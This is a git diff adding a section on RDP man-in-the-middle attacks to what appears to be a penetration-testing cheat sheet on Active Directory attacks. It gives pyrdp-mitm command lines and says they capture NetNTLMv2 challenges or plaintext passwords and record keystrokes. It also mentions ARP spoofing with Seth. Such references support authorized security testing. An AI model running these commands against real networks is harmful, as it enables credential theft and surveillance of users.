Update Active Directory Attack.md

2024-06-10 02:06:32 +02:00 · 2022-10-12 19:47:40 +02:00 · 2022-10-12 19:47:40 +02:00 · f18d4991ff
parent aca668fcdd
commit f18d4991ff
1 changed files with 15 additions and 0 deletions
--- a/Resources/Active
+++ b/Resources/Active
@ -2219,6 +2219,21 @@ secretsdump.py -k -no-pass target.lab.local
    # IP of PC1: 10.0.0.4
    ```

+#### Man-in-the-middle RDP connections with pyrdp-mitm
+* https://github.com/GoSecure/pyrdp
+* https://www.gosecure.net/blog/2018/12/19/rdp-man-in-the-middle-smile-youre-on-camera/
+* Usage
+```sh
+pyrdp-mitm.py <IP>
+pyrdp-mitp.py <IP>:<PORT> # with custom port
+pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and certificate
+```
+* Exploitation
+  * If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge
+  * If NLA is disabled, you will obtain the password in plaintext
+  * Other features are available such as keystroke recording
+* Alternatives
+  * S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener	

 ### Active Directory Certificate Services